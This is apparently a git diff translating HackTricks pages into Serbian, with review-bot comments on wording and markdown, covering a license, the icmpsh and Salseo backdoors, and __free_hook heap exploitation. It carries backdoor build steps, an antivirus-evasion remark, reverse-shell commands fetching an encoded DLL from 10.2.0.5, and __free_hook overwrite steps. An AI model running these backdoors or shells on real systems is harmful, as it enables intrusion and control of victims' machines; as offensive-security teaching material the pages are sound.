prava. ## Odeljak 5 – Odricanje od garancija i ograničenje odgovornosti. -a. **Osim ako Licencodavac nije drugačije preuzeo obavezu, u meri u kojoj je to moguće, Licencodavac nudi Licencirani Materijal "kako jeste" i "kako je dostupno", i ne daje nikakve izjave ili garancije bilo koje vrste u vezi sa Licenciranim Materijalom, bilo izričite, implicirane, zakonske ili druge. Ovo uključuje, bez ograničenja, garancije vlasništva, prodajne sposobnosti, pogodnosti za određenu svrhu, nekršenja, odsustva latentnih ili drugih nedostataka, tačnosti, ili prisustva ili odsustva grešaka, bez obzira na to da li su poznate ili otkrivene. 
Gde odricanja od garancija nisu dozvoljena u potpunosti ili delimično, ovo odricanje se možda neće primeniti na vas.** +a. **Osim ako nije drugačije posebno preuzeto od strane Licencodavca, u meri u kojoj je to moguće, Licencodavac nudi Licencirani Materijal "kako jeste" i "kako je dostupno", i ne daje nikakve izjave ili garancije bilo koje vrste u vezi sa Licenciranim Materijalom, bilo izričite, implicirane, zakonske ili druge. Ovo uključuje, bez ograničenja, garancije vlasništva, prodajne sposobnosti, pogodnosti za određenu svrhu, nekršenja, odsustva latentnih ili drugih nedostataka, tačnosti, ili prisustva ili odsustva grešaka, bez obzira na to da li su poznate ili otkrivene. Gde odricanja od garancija nisu dozvoljena u potpunosti ili delimično, ovo odricanje se možda neće primeniti na vas.** b. **U meri u kojoj je to moguće, u nijednom slučaju Licencodavac neće biti odgovoran prema vama na bilo kojoj pravnoj osnovi (uključujući, bez ograničenja, nemar) ili na drugi način za bilo kakve direktne, posebne, indirektne, slučajne, posledične, kaznene, uzorničke ili druge gubitke, troškove, izdatke ili štete proizašle iz ove Javne Licence ili korišćenja Licenciranog Materijala, čak i ako je Licencodavac bio obavešten o mogućnosti takvih gubitaka, troškova, izdataka ili šteta. Gde ograničenje odgovornosti nije dozvoljeno u potpunosti ili delimično, ovo ograničenje se možda neće primeniti na vas.** 
@@ -147,9 +147,9 @@ c. Radi izbegavanja sumnje, Licencodavac može takođe ponuditi Licencirani Mate d. Odeljci 1, 5, 6, 7 i 8 opstaju nakon raskida ove Javne Licence. -## Odeljak 7 – Ostali uslovi i odredbe. +## Odeljak 7 – Drugi uslovi i odredbe. -a. Licencodavac neće biti obavezan bilo kojim dodatnim ili različitim uslovima ili odredbama koje ste vi saopštili osim ako nije izričito dogovoreno. +a. Licencodavac neće biti vezan bilo kojim dodatnim ili različitim uslovima ili odredbama koje ste vi saopštili osim ako nije izričito dogovoreno. b. Bilo kakvi dogovori, razumevanja ili sporazumi u vezi sa Licenciranim Materijalom koji nisu ovde navedeni su odvojeni i nezavisni od uslova i odredbi ove Javne Licence. 
@@ -157,9 +157,9 @@ b. Bilo kakvi dogovori, razumevanja ili sporazumi u vezi sa Licenciranim Materij a. Radi izbegavanja sumnje, ova Javna Licenca ne smanjuje, ne ograničava, ne restriktivno tumači, niti nameće uslove na bilo koju upotrebu Licenciranog Materijala koja bi se mogla zakonito izvršiti bez dozvole prema ovoj Javnoj Licenci. -b. U meri u kojoj je to moguće, ako se bilo koja odredba ove Javne Licence smatra neizvršivom, ona će se automatski reformisati na minimalni stepen potreban da bi bila izvršiva. Ako se odredba ne može reformisati, ona će biti odvojena od ove Javne Licence bez uticaja na izvršivost preostalih uslova i odredbi. +b. U meri u kojoj je to moguće, ako se bilo koja odredba ove Javne Licence smatra neizvršivom, ona će se automatski reformisati na minimalni stepen potreban da bi bila izvršna. Ako se odredba ne može reformisati, ona će biti odvojena od ove Javne Licence bez uticaja na izvršivost preostalih uslova i odredbi. -c. Nijedna odredba ili uslov ove Javne Licence neće biti odustajan i nijedno nepoštovanje neće biti prihvaćeno osim ako nije izričito dogovoreno od strane Licencodavca. +c. Nijedna odredba ili uslov ove Javne Licence neće biti odustajanje i nijedno nepoštovanje neće biti pristano osim ako nije izričito dogovoreno od strane Licencodavca. d. Ništa u ovoj Javnoj Licenci ne predstavlja ili se ne može tumačiti kao ograničenje, ili odricanje od, bilo kojih privilegija i imuniteta koji se primenjuju na Licencodavca ili vas, uključujući od pravnih procesa bilo koje jurisdikcije ili vlasti. ``` diff --git a/src/README.md b/src/README.md index e86a1826c..7b8f36680 100644 --- a/src/README.md +++ b/src/README.md 
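Review bot: two of the rewordings in the 8(b) and 8(c) lines change meaning rather than improve it. In 8(b) "izvršiva" (enforceable) becomes "izvršna" (executive, executable); the sentence is about enforceability, so the removed "izvršiva" was the correct word. In 8(c) "neće biti odustajanje i nijedno nepoštovanje neće biti pristano" is ungrammatical; the sense of "no term will be waived and no failure to comply consented to" reads correctly as "Od nijednog uslova ili odredbe ove Javne Licence neće se odustati i ni na jedno nepoštovanje neće se pristati, osim ako to Licencodavac izričito ne odobri". Section 7(a) ("vezan" for "obavezan") is fine.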
@@ -123,7 +123,7 @@ Naučite tehnologije i veštine potrebne za izvođenje istraživanja ranjivosti, WebSec je **sve-u-jednom bezbednosna kompanija** što znači da rade sve; Pentesting, **Bezbednosne** revizije, Obuke o svesti, Phishing kampanje, Revizije koda, Razvoj eksploata, Outsourcing bezbednosnih stručnjaka i još mnogo toga. -Još jedna zanimljiva stvar o WebSec-u je da, za razliku od industrijskog proseka, WebSec je **veoma siguran u svoje veštine**, do te mere da **garantuje najbolje kvalitetne rezultate**, kako stoji na njihovom sajtu "**Ako ne možemo da hakujemo, ne plaćate!**". Za više informacija pogledajte njihov [**sajt**](https://websec.nl/en/) i [**blog**](https://websec.nl/blog/)! +Još jedna zanimljiva stvar o WebSec-u je da, za razliku od industrijskog proseka, WebSec je **veoma siguran u svoje veštine**, do te mere da **garantuje najbolje kvalitetne rezultate**, kako stoji na njihovoj veb stranici "**Ako ne možemo da hakujemo, ne plaćate!**". Za više informacija pogledajte njihovu [**vеб страницу**](https://websec.nl/en/) i [**blog**](https://websec.nl/blog/)! Pored navedenog, WebSec je takođe **posvećen podržavalac HackTricks.** diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 4a8579657..fb3efcc74 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -868,3 +868,4 @@ - [Cookies Policy](todo/cookies-policy.md) + diff --git a/src/android-forensics.md b/src/android-forensics.md index c4ccaa007..09009851b 100644 --- a/src/android-forensics.md +++ b/src/android-forensics.md 
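Review bot: the link text `[**vеб страницу**]` in the README.md hunk mixes Cyrillic letters into a file that is otherwise Latin-script Serbian (the same line already says "njihovoj veb stranici"), so it renders in a visibly different alphabet; use `[**veb stranicu**]`. In the SUMMARY.md hunk on the same line the only change is a `+` line containing nothing but whitespace appended after the Cookies Policy entry; drop it unless the book generator needs a final newline, and if so make it a plain newline rather than a line with a trailing space.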
@@ -10,11 +10,11 @@ Da biste započeli ekstrakciju podataka sa Android uređaja, mora biti otključa - Proveriti za mogući [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf) - Pokušati sa [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) -## Akvizicija podataka +## Ekstrakcija podataka Kreirajte [android backup koristeći adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) i ekstraktujte ga koristeći [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` -### Ako postoji root pristup ili fizička veza sa JTAG interfejsom +### Ako imate root pristup ili fizičku vezu sa JTAG interfejsom - `cat /proc/partitions` (pronađite putanju do flash memorije, obično je prvi unos _mmcblk0_ i odgovara celoj flash memoriji). - `df /data` (otkrijte veličinu bloka sistema). diff --git a/src/backdoors/icmpsh.md b/src/backdoors/icmpsh.md index 6c48091a3..ecdeafcc4 100644 --- a/src/backdoors/icmpsh.md +++ b/src/backdoors/icmpsh.md 
@@ -1,31 +1,25 @@ {{#include ../banners/hacktricks-training.md}} -Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) +Preuzmite backdoor sa: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) -# Client side +# Klijentska strana -Execute the script: **run.sh** - -**If you get some error, try to change the lines:** +Izvršite skriptu: **run.sh** +**Ako dobijete neku grešku, pokušajte da promenite linije:** ```bash IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') ``` - -**For:** - +**Za:** ```bash echo Please insert the IP where you want to listen read IP ``` +# **Strana žrtve** -# **Victim Side** - -Upload **icmpsh.exe** to the victim and execute: - +Otpremite **icmpsh.exe** na žrtvu i izvršite: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` - {{#include ../banners/hacktricks-training.md}} diff --git a/src/backdoors/salseo.md b/src/backdoors/salseo.md index 90cf5338c..cca21bcff 100644 --- a/src/backdoors/salseo.md +++ b/src/backdoors/salseo.md 
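Review bot: the icmpsh.md hunk removes the blank lines that separated the `**Ako dobijete neku grešku, pokušajte da promenite linije:**` paragraph, the `**Za:**` line and the `# **Strana žrtve**` heading from the adjacent ```bash fences. CommonMark tolerates this, but the removed lines show the file previously kept a blank line around every fence; keep that convention so the bold paragraphs are not glued to the code blocks.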
@@ -2,41 +2,37 @@ {{#include ../banners/hacktricks-training.md}} -## Compiling the binaries +## Kompajliranje binarnih fajlova -Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code. +Preuzmite izvorni kod sa github-a i kompajlirajte **EvilSalsa** i **SalseoLoader**. Biće vam potreban **Visual Studio** instaliran da biste kompajlirali kod. -Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures). +Kompajlirajte te projekte za arhitekturu Windows mašine na kojoj ćete ih koristiti (Ako Windows podržava x64, kompajlirajte ih za tu arhitekturu). -You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".** +Možete **izabrati arhitekturu** unutar Visual Studio-a u **levom "Build" tabu** u **"Platform Target".** -(\*\*If you can't find this options press in **"Project Tab"** and then in **"\ Properties"**) +(\*\*Ako ne možete pronaći ove opcije, pritisnite na **"Project Tab"** a zatim na **"\ Properties"**) ![](<../images/image (132).png>) -Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable): +Zatim, izgradite oba projekta (Build -> Build Solution) (Unutar logova će se pojaviti putanja do izvršnog fajla): ![](<../images/image (1) (2) (1) (1) (1).png>) -## Prepare the Backdoor +## Pripremite Backdoor -First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**: +Prvo, biće potrebno da kodirate **EvilSalsa.dll.** Da biste to uradili, možete koristiti python skriptu **encrypterassembly.py** ili možete kompajlirati projekat **EncrypterAssembly**: ### **Python** - ``` python EncrypterAssembly/encrypterassembly.py python 
EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt ``` - ### Windows - ``` EncrypterAssembly.exe EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt ``` - -Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.** +U redu, sada imate sve što vam je potrebno da izvršite sve Salseo stvari: **encoded EvilDalsa.dll** i **binary of SalseoLoader.** **Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...** 
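Review bot: the last `+` line of this hunk is only half translated: "**encoded EvilDalsa.dll** i **binary of SalseoLoader.**" keeps the English phrases inside a Serbian sentence, and the bold sentence right below it ("**Upload the SalseoLoader.exe binary to the machine...**") is left in English as unchanged context; translate both, e.g. "**kodirani EvilSalsa.dll** i **SalseoLoader binarni fajl**". That same line also carries over the "EvilDalsa.dll" typo from the original while every other mention in the file is EvilSalsa; fix it while the line is being touched. As in icmpsh.md, the blank lines before and after the fences under "### **Python**" and "### Windows" are dropped.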
@@ -44,117 +40,86 @@ Ok, now you have everything you need to execute all the Salseo thing: the **enco ### **Getting a TCP reverse shell (downloading encoded dll through HTTP)** -Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa. - +Zapamtite da pokrenete nc kao slušalac za reverznu ljusku i HTTP server da poslužite encoded evilsalsa. ``` SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp ``` +### **Dobijanje UDP reverzibilnog shell-a (preuzimanje kodirane dll preko SMB)** -### **Getting a UDP reverse shell (downloading encoded dll through SMB)** - -Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver). - +Zapamtite da pokrenete nc kao slušača reverzibilnog shell-a, i SMB server da posluži kodirani evilsalsa (impacket-smbserver). ``` SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp ``` +### **Dobijanje ICMP reverz shell-a (kodirana dll već unutar žrtve)** -### **Getting a ICMP reverse shell (encoded dll already inside the victim)** - -**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) - -#### **Disable ICMP Replies:** +**Ovoga puta vam je potreban poseban alat na klijentu da primite reverz shell. 
Preuzmite:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) +#### **Onemogućite ICMP odgovore:** ``` sysctl -w net.ipv4.icmp_echo_ignore_all=1 #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 ``` - -#### Execute the client: - +#### Izvrši klijenta: ``` python icmpsh_m.py "" "" ``` - -#### Inside the victim, lets execute the salseo thing: - +#### Unutar žrtve, hajde da izvršimo salseo stvar: ``` SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ``` +## Kompajliranje SalseoLoader-a kao DLL koji izvozi glavnu funkciju -## Compiling SalseoLoader as DLL exporting main function +Otvorite SalseoLoader projekat koristeći Visual Studio. -Open the SalseoLoader project using Visual Studio. - -### Add before the main function: \[DllExport] +### Dodajte pre glavne funkcije: \[DllExport] ![](<../images/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -### Install DllExport for this project +### Instalirajte DllExport za ovaj projekat -#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** +#### **Alati** --> **NuGet Package Manager** --> **Upravljanje NuGet paketima za rešenje...** ![](<../images/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** +#### **Pretražite DllExport paket (koristeći Browse tab), i pritisnite Instaliraj (i prihvatite iskačući prozor)** ![](<../images/image (4) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -In your project folder have appeared the files: **DllExport.bat** and **DllExport_Configure.bat** +U vašem projektnom folderu pojavili su se fajlovi: **DllExport.bat** i **DllExport_Configure.bat** -### **U**ninstall DllExport +### **De**instalirajte DllExport -Press **Uninstall** (yeah, its weird but trust me, it is necessary) +Pritisnite **Deinstaliraj** (da, čudno je, ali verujte mi, to 
je neophodno) ![](<../images/image (5) (1) (1) (2) (1).png>) -### **Exit Visual Studio and execute DllExport_configure** +### **Izađite iz Visual Studio i izvršite DllExport_configure** -Just **exit** Visual Studio +Jednostavno **izađite** iz Visual Studio -Then, go to your **SalseoLoader folder** and **execute DllExport_Configure.bat** +Zatim, idite u vaš **SalseoLoader folder** i **izvršite DllExport_Configure.bat** -Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply** +Izaberite **x64** (ako ćete ga koristiti unutar x64 okruženja, to je bio moj slučaj), izaberite **System.Runtime.InteropServices** (unutar **Namespace for DllExport**) i pritisnite **Primeni** ![](<../images/image (7) (1) (1) (1) (1).png>) -### **Open the project again with visual Studio** +### **Ponovo otvorite projekat sa Visual Studio** -**\[DllExport]** should not be longer marked as error - -![](<../images/image (8) (1).png>) - -### Build the solution - -Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library) - -![](<../images/image (10) (1).png>) - -Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64) - -![](<../images/image (9) (1) (1).png>) - -To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear) - -### Test the generated Dll - -Copy and paste the Dll where you want to test it. - -Execute: +**\[DllExport]** više ne bi trebao biti označen kao greška +![](<../images/image (8) (1).png> ``` rundll32.exe SalseoLoader.dll,main ``` +Ako se ne pojavi greška, verovatno imate funkcionalni DLL!! -If no error appears, probably you have a functional DLL!! 
+## Dobijanje shel-a koristeći DLL -## Get a shell using the DLL - -Don't forget to use a **HTTP** **server** and set a **nc** **listener** +Ne zaboravite da koristite **HTTP** **server** i postavite **nc** **listener** ### Powershell - ``` $env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" @@ -163,9 +128,7 @@ $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main ``` - ### CMD - ``` set pass=password set payload=http://10.2.0.5/evilsalsax64.dll.txt @@ -174,5 +137,4 @@ set lport=1337 set shell=reversetcp rundll32.exe SalseoLoader.dll,main ``` - {{#include ../banners/hacktricks-training.md}} diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md index b03deaf4a..8fc60c0cd 100644 --- a/src/banners/hacktricks-training.md +++ b/src/banners/hacktricks-training.md @@ -1,13 +1,13 @@ > [!TIP] -> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> Učite i vežbajte AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> Učite i vežbajte GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) > >
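Review bot: the line `+![](<../images/image (8) (1).png>` near the end of this hunk is missing its closing `)`, so the image markdown is broken and the ``` fence that follows it is at risk of being parsed as part of the link; restore `![](<../images/image (8) (1).png>)`. The hunk also deletes the whole "Build the solution" and "Test the generated Dll" sections (Output Type = Class Library, Platform target = x64, Build -> Build Solution, copying the DLL to the test location, plus two images) with no translated replacement, so the `rundll32.exe SalseoLoader.dll,main` command now appears directly after "**\[DllExport]** više ne bi trebao biti označen kao greška" with no step that actually produces the DLL; translate those lines instead of removing them. Smaller points: the heading `### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**` is left in English as context while its sibling headings are translated; "reverzibilnog shell-a" means "reversible", not "reverse", and the same hunk also uses "reverz shell" and "reverznu ljusku" for the same thing, so settle on one term; "shel-a" in "## Dobijanje shel-a" should be "shell-a".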
> -> Support HackTricks +> Podržite HackTricks > -> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. > >
diff --git a/src/binary-exploitation/arbitrary-write-2-exec/README.md b/src/binary-exploitation/arbitrary-write-2-exec/README.md index 117d2440a..5de6cdb61 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/README.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md @@ -1,3 +1 @@ # Arbitrary Write 2 Exec - - diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md index 7bd874ca8..e85a5604e 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md 
@@ -4,34 +4,32 @@ ## **Malloc Hook** -As you can [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html), the variable **`__malloc_hook`** is a pointer pointing to the **address of a function that will be called** whenever `malloc()` is called **stored in the data section of the libc library**. Therefore, if this address is overwritten with a **One Gadget** for example and `malloc` is called, the **One Gadget will be called**. +Kao što možete videti na [Official GNU site](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html), promenljiva **`__malloc_hook`** je pokazivač koji pokazuje na **adresu funkcije koja će biti pozvana** svaki put kada se pozove `malloc()` **smeštena u sekciji podataka libc biblioteke**. Stoga, ako se ova adresa prepiše sa **One Gadget**, na primer, i pozove se `malloc`, **One Gadget će biti pozvan**. -To call malloc it's possible to wait for the program to call it or by **calling `printf("%10000$c")`** which allocates too bytes many making `libc` calling malloc to allocate them in the heap. +Da biste pozvali malloc, moguće je čekati da program to pozove ili **pozivom `printf("%10000$c")`** koji alocira previše bajtova, čime `libc` poziva malloc da ih alocira na heap-u. -More info about One Gadget in: +Više informacija o One Gadget-u u: {{#ref}} ../rop-return-oriented-programing/ret2lib/one-gadget.md {{#endref}} > [!WARNING] -> Note that hooks are **disabled for GLIBC >= 2.34**. There are other techniques that can be used on modern GLIBC versions. See: [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md). +> Imajte na umu da su hook-ovi **onemogućeni za GLIBC >= 2.34**. Postoje druge tehnike koje se mogu koristiti na modernim verzijama GLIBC. 
Vidi: [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md). ## Free Hook -This was abused in one of the example from the page abusing a fast bin attack after having abused an unsorted bin attack: +Ovo je zloupotrebljeno u jednom od primera sa stranice koja zloupotrebljava napad na brzu kantu nakon što je zloupotrebljen napad na neusmerenu kantu: {{#ref}} ../libc-heap/unsorted-bin-attack.md {{#endref}} -It's posisble to find the address of `__free_hook` if the binary has symbols with the following command: - +Moguće je pronaći adresu `__free_hook` ako binarni fajl ima simbole sa sledećom komandom: ```bash gef➤ p &__free_hook ``` - -[In the post](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html) you can find a step by step guide on how to locate the address of the free hook without symbols. As summary, in the free function: +[U postu](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html) možete pronaći vodič korak po korak o tome kako locirati adresu slobodnog hook-a bez simbola. Kao sažetak, u funkciji free:
gef➤  x/20i free
 0xf75dedc0 <free>: push   ebx
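Review bot: "napad na brzu kantu" and "napad na neusmerenu kantu" in the Free Hook paragraph translate the technique names "fast bin attack" and "unsorted bin attack" word for word ("kanta" is a bucket), while the next hunk of this same file keeps "**fast bin attack**" in English and the `{{#ref}}` right below points at `unsorted-bin-attack.md`; keep the English names. Likewise "slobodnog hook-a" renders `free` as the adjective "free", but `__free_hook` is the hook for the `free()` function, so "free hook-a" (or simply "`__free_hook`") is the correct reading. The blank lines around the ```bash fence are dropped here as well.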
@@ -45,26 +43,26 @@ gef➤  p &__free_hook
 0xf75deddd <free+29>:  jne    0xf75dee50 <free+144>
 
-In the mentioned break in the previous code in `$eax` will be located the address of the free hook. +Na pomenutom break-u u prethodnom kodu u `$eax` će se nalaziti adresa slobodnog hook-a. -Now a **fast bin attack** is performed: +Sada se vrši **fast bin attack**: -- First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location: +- Prvo je otkriveno da je moguće raditi sa brzim **chunk-ovima veličine 200** na lokaciji **`__free_hook`**: -
gef➤  p &__free_hook
-  $1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
-  gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
-  0x7ff1e9e6074f: 0x0000000000000000      0x0000000000000200
-  0x7ff1e9e6075f: 0x0000000000000000      0x0000000000000000
-  0x7ff1e9e6076f <list_all_lock+15>:      0x0000000000000000      0x0000000000000000
-  0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000      0x0000000000000000
-  
- - If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed -- For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin. -- Then, the edit function is called in this chunk to modify the **`fd`** address of this fast bin to point to the previous **`__free_hook`** function. -- Then, a chunk with size `0x1f8` is created to retrieve from the fast bin the previous useless chunk so another chunk of size `0x1f8` is created to get a fast bin chunk in the **`__free_hook`** which is overwritten with the address of **`system`** function. -- And finally a chunk containing the string `/bin/sh\x00` is freed calling the delete function, triggering the **`__free_hook`** function which points to system with `/bin/sh\x00` as parameter. +$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook> +gef➤ x/60gx 0x7ff1e9e607a8 - 0x59 +0x7ff1e9e6074f: 0x0000000000000000 0x0000000000000200 +0x7ff1e9e6075f: 0x0000000000000000 0x0000000000000000 +0x7ff1e9e6076f <list_all_lock+15>: 0x0000000000000000 0x0000000000000000 +0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000 0x0000000000000000 + +- Ako uspemo da dobijemo brzi chunk veličine 0x200 na ovoj lokaciji, biće moguće prepisati pokazivač funkcije koja će biti izvršena +- Za to, kreira se novi chunk veličine `0xfc` i spojena funkcija se poziva sa tim pokazivačem dva puta, na taj način dobijamo pokazivač na oslobođeni chunk veličine `0xfc*2 = 0x1f8` u fast bin-u. +- Zatim se poziva funkcija za izmenu u ovom chunk-u da modifikuje adresu **`fd`** ovog fast bin-a da pokazuje na prethodnu funkciju **`__free_hook`**. 
+- Zatim se kreira chunk veličine `0x1f8` da se povuče iz fast bin-a prethodni beskorisni chunk tako da se kreira još jedan chunk veličine `0x1f8` da se dobije fast bin chunk u **`__free_hook`** koji se prepisuje sa adresom funkcije **`system`**. +- I konačno, chunk koji sadrži string `/bin/sh\x00` se oslobađa pozivom funkcije za brisanje, aktivirajući funkciju **`__free_hook`** koja pokazuje na system sa `/bin/sh\x00` kao parametrom. -## References +## Reference - [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook) - [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md). diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md index ad09ee48e..aca3aa466 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.md 
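Review bot: the replacement gef listing in this hunk loses its structure. The removed lines were indented two spaces so that the `p &__free_hook` / `x/60gx` output sat inside the "Prvo je otkriveno..." bullet; the `+` lines start at column 0 and begin at `$1 = ...`, with no `gef➤ p &__free_hook` command line above the result, so the listing falls out of the list item and the bullets that follow ("Ako uspemo...") start a new list. Restore the indentation and the command line. The first `+` line of the hunk repeats the "slobodnog hook-a" problem from the previous hunk: this is the hook for `free()`, not "free" as an adjective.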
@@ -2,86 +2,86 @@ {{#include ../../banners/hacktricks-training.md}} -## **Basic Information** +## **Osnovne informacije** ### **GOT: Global Offset Table** -The **Global Offset Table (GOT)** is a mechanism used in dynamically linked binaries to manage the **addresses of external functions**. Since these **addresses are not known until runtime** (due to dynamic linking), the GOT provides a way to **dynamically update the addresses of these external symbols** once they are resolved. +**Global Offset Table (GOT)** je mehanizam koji se koristi u dinamički povezanim binarnim datotekama za upravljanje **adresama spoljašnjih funkcija**. Pošto su te **adrese nepoznate do vremena izvršavanja** (zbog dinamičkog povezivanja), GOT pruža način da se **dinamički ažuriraju adrese ovih spoljašnjih simbola** kada se reše. -Each entry in the GOT corresponds to a symbol in the external libraries that the binary may call. When a **function is first called, its actual address is resolved by the dynamic linker and stored in the GOT**. Subsequent calls to the same function use the address stored in the GOT, thus avoiding the overhead of resolving the address again. +Svaki unos u GOT odgovara simbolu u spoljnim bibliotekama koje binarna datoteka može pozvati. Kada se **funkcija prvi put pozove, njena stvarna adresa se rešava putem dinamičkog linker-a i čuva u GOT**. Naknadni pozivi iste funkcije koriste adresu koja je sačuvana u GOT, čime se izbegava preopterećenje ponovnog rešavanja adrese. ### **PLT: Procedure Linkage Table** -The **Procedure Linkage Table (PLT)** works closely with the GOT and serves as a trampoline to handle calls to external functions. When a binary **calls an external function for the first time, control is passed to an entry in the PLT associated with that function**. This PLT entry is responsible for invoking the dynamic linker to resolve the function's address if it has not already been resolved. After the address is resolved, it is stored in the **GOT**. 
